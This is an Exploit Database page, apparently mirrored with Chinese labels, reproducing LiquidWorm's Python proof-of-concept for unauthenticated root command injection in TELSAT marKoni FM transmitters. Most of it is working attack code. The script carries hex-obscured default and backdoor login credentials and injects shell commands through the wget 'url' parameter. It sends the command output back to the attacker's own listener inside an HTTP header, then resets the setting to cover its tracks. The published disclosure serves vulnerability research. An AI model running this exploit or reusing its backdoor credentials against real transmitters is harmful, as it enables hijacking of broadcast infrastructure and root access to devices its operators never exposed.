TELSAT marKoni FM Transmitter 1.9.5 – Root Command Injection

• Exploit Database
• 38 阅读

• 作者： LiquidWorm
  日期： 2024-03-18
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51906/

• #!/usr/bin/env python
  #
  #
  # TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection PoC Exploit
  #
  #
  # Vendor: TELSAT Srl
  # Product web page: https://www.markoni.it
  # Affected version: Markoni-D (Compact) FM Transmitters
  # Markoni-DH (Exciter+Amplifiers) FM Transmitters
  # Markoni-A (Analogue Modulator) FM Transmitters
  # Firmware: 1.9.5
  # 1.9.3
  # 1.5.9
  # 1.4.6
  # 1.3.9
  #
  # Summary: Professional FM transmitters.
  #
  # Desc: The marKoni FM transmitters are susceptible to unauthenticated
  # remote code execution with root privileges. An attacker can exploit
  # a command injection vulnerability by manipulating the Email settings'
  # WAN IP info service, which utilizes the 'wget' module. This allows
  # the attacker to gain unauthorized access to the system with administrative
  # privileges by exploiting the 'url' parameter in the HTTP GET request
  # to ekafcgi.fcgi.
  #
  # -------------------------------------------------------------------------
  # [lqwrm@metalgear ~]# python yp.tiolpxe 10.0.8.3:88 backdoor 10.0.8.69 whoami
  # Authentication successful for backdoor
  # Injecting command: whoami
  # Listening on port 9999
  # ('10.0.8.3', 47302) called back
  # Received: root
  # Housekeeping...
  # Zya and thanks for stopping by!
  #
  # [lqwrm@metalgear ~]# 
  #
  # -------------------------------------------------------------------------
  #
  # Tested on: GNU/Linux 3.10.53 (armv7l)
  #icorem6solox
  #lighttpd/1.4.33
  #
  #
  # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  # Macedonian Information Security Research and Development Laboratory
  # Zero Science Lab - https://www.zeroscience.mk - @zeroscience
  #
  #
  # Advisory ID: ZSL-2024-5808
  # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5808.php
  #
  #
  # 10.11.2023
  #
  
  from colorama import init, Fore
  import re,os,sys,requests
  import socket,threading
  from time import sleep
  init()
  
  def just_listen_to_me(lport, cstop):
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.bind(("0.0.0.0", lport))
  s.listen(1)
  print("Listening on port " + str(lport))
  try:
  conn, addr = s.accept()
  print(addr, "called back")
  cstop.set()
  except socket.timeout:
  print("Call return timeout\nCheck your ports")
  conn.close()
  while True:
  try:
  odg = conn.recv(1771).decode()
  uam = re.search(r"User-Agent:\s*(.*)", odg)
  
  if uam:
  uav = uam.group(1)
  print(f"Received: {uav}")
  exit()
  else:
  print("No output for you")
  except:
  print("Housekeeping...")
  exit()
  s.close()
  
  def authenticate(ipaddr, option): #### Encrypted Shit ####_"
  auth_url = f"http://{ipaddr}" # oOoOoOoOoOoOoOoOoOoOoOo"
  ep = "/cgi-bin/ekafcgi.fcgi?OpCode=" ##################"
  if option == "user": ##################################"
  username = "\x75\x73\x65\x72" #####################"
  password = "\x75\x73\x65\x72" #####################"
  elif option == "admin": ###############################"
  username = "\x61\x64\x6D\x69\x6E" #################"
  password = "\x61\x64\x6D\x69\x6E" #################"
  elif option == "backdoor": ############################"
  username = "\x66\x61\x63\x74\x6F\x72\x79" #########"
  password = "\x69\x6E\x6F\x6B\x72\x61\x6D\x32\x35"#_"
  
  authp = {
  'username': username,
  'password': password
  }
  
  resp = requests.get(auth_url + ep + "1", params=authp)
  
  if "Set-Cookie" in resp.headers:
  print(f"Authentication successful for {option}")
  auth_cookie = resp.headers["Set-Cookie"].split(";")[0]
  return auth_cookie
  else:
  print(f"Authentication failed for {option}.")
  print("Try a different option.")
  return None
  
  def execute(ipaddr, cookie, command, listen_ip):
  print(f"Injecting command: {command}")
  ep = "/cgi-bin/ekafcgi.fcgi?OpCode="
  eden = f"http://{ipaddr}{ep}26&param=wget&ena=1&url=-U%20%60{command}%60%20{listen_ip}:9999"
  dva = f"http://{ipaddr}{ep}27"
  tri = f"http://{ipaddr}{ep}26&param=wget&ena=0&url="
  clear = f"http://{ipaddr}{ep}3&com1=203C%20001001"
  
  headers = {"Cookie": cookie}
  
  requests.get(eden, headers=headers)
  sleep(2)
  requests.get(dva, headers=headers)
  sleep(2)
  requests.get(tri, headers=headers)
  sleep(1)
  requests.get(clear, headers=headers)
  print("Zya and thanks for stopping by!")
  exit(0)
  
  def njaaah(text):
  columns = os.get_terminal_size().columns
  print(text.center(columns))
  
  zsl = "\033[91mWaddup!\033[0m" #Win64
  mrjox = f"""
   ________
   /\\
  /____\\
   | /0 \\ |
   | \\______/ | 
  \\____________/{zsl}
   | |
  / \\
   /O\\
  |O\\
  | \\
  |\\
  |_________|
  """
  
  if len(sys.argv) != 5:
  print()
  print("This is a PoC script for the marKoni transmitters 0day")
  print("Usage: python yp.tiolpxe <target_ip:port> <option> <listen_ip> <command>")
  print("Option: 'user', 'admin', 'backdoor'")
  print("Default listening port: 9999")
  njaaah(mrjox)
  exit()
  
  ipaddr = sys.argv[1]
  opt = sys.argv[2]
  listen_ip = sys.argv[3]
  command = sys.argv[4]
  
  opt_map = {
  "admin": "admin",
  "user" : "user",
  "backdoor" : "backdoor"
  }
  
  if opt in opt_map:
  auth_cookie = authenticate(ipaddr, opt_map[opt])
  if auth_cookie:
  cstop = threading.Event()
  lt = threading.Thread(target=just_listen_to_me, args=(9999, cstop))
  lt.start()
  execute(ipaddr, auth_cookie, command, listen_ip)
  cstop.set()
  lt.join()
  else:
  print("Invalid option.")